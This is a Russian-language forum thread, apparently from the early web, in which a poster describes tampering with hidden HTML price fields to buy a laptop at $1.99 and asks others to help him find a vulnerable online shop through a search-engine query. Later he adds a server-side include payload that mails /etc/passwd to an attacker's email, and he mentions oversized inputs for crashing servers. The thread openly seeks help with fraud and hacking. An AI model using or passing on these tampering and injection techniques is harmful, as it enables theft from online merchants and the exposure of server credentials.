ХОЧУ НОУТБУК КУПИТЬ НЕЗНАЮ ГДЕ АААА!!!! Неправильное использование скрытных тегов В интернете действует множество компаний, которые продают товары или предоставляют услуги через web-сайты. Плохо проработанная пользовательская корзинка сайтика, электронной торговли позволяет атакующему фальсифицировать (заменят русским языком) важные данные, например стоимость ноутбука которого я хочу купить. Вообразим что мелкая фирма открыла сайт по продажи ноутбуков через Интернет. Однако сделала принципиальную ошибочку в коде сайта- использавала скрытые теги HTML в качестве единственного средства присвоения цены моиму ноутбуку. В результате такие хакеры как вы и такой молодой как я,,,, обнаружев эту уязвимость, сможем изменить скрытый тег цены и снизить свои затраты при приобретении такого кульноко ноута как у меня. Допусти, сто web-сайт использует следующий код html на странице продажи товаров: <FORM ACTION=http://www.thief.com/cgi-bin/order.pl method=”post”> <input type=hidden name=”price” value=”199.99”> <input type=hidden name=”prd_id” value=”X190”> QUANTITY:<input type=text name=”quant” size=3 maxlength=3 value=1> </FORM> Как я закалибался это писать та а!!!! Простое изменение цены в обычном текстовом редакторе позволит заплатить хакеру всего $1.99 вместо $199.99. <input type=hidden name=”price” value=” 1.99 ”> К большому нашему с вами сожалению эти ошибки распространены в инете!!! Ну вот и вопросец кто найдё такой сайт просьба ответеть ну и чтоб там ноутбуки продавали. Да кстати если что задавайте вопросы по защите от такой вот фигни. Просьба отвечать только по теме и не говорите что здесь много ошибок в граматике я сам знаю!!!!
Помогите админы это к вам. Делаю запрос на www.altavista.com вот такой "type=hidden name=price" он мне находит столько уязвимых сайтов что у меня голова кругом идёт так вот мне надо найти в этойкуче интернет магазин русский. Я по англисски плохо понимаю может поможете уязвимый магаз найти так хочится ноутбук купить по дешовки.
Thief, это все фигня. Ты же будешь покупать его через кредитку, а не через хтмл-форму ... Тем более цены хранятся не в хтмл (что самом по себе смешно и невозможно), а в базе данных ... Можно даже навископом подделать эти значения, только не имеет смысла ...
А в твоей книге не написано, как открыть файл www.sait.ru/password.txt и замутить смачный дефейс ? Полистай, мож есть такой метод ...
Нет Че Гевара там ничего такого ненаписано я изложил в этой статейке всё что там написали ну вот дополнение из неё. Ещё одной формой атаки является использование длинных значений в полях страницы. Во время разработки устонавливается определённый размер поля, но атакующий может увеличить его, например, до 70 000 символов и послать длинную строку которая вполне способна вызвать крах сервера или, по крайней мере, возвратит неожиданный результат. Это всё что было написано. Но сам факт парни что ведь можножи купить подишовки только надо проработать схему покупки тоесть взломать сайт. Ну что помогите мне с осуществлением плана такого. Сделай те запрос на www.altavista.com и посмотрите сколько сайтов уязвимых там. Насчёт файла www.sait.ru/password.txt такого файла там вообще нет. Атака заключается в следующем если вы не поняли: Вставка кода SSI в поле страницы который трактуется web-сервером как документ html. В результате появляется возможность локального исполнения команд. Поправте если неправильно. Так точно я продолжу. Например вставка SSI в первое или последнее поле во время созданияновой учётной записи приведёт к томуб что web-сервер попытается исполнить указанное выражение . Приведём пример кодаSSI который пересылает хакеру пароли по электронной почти. <! --#exec cmd="/bin/mail [email protected] < cat /etc/passwd"--> Вот и всё впринципе помогите с покупкой или взломом теперь уже неизвесно с чем.
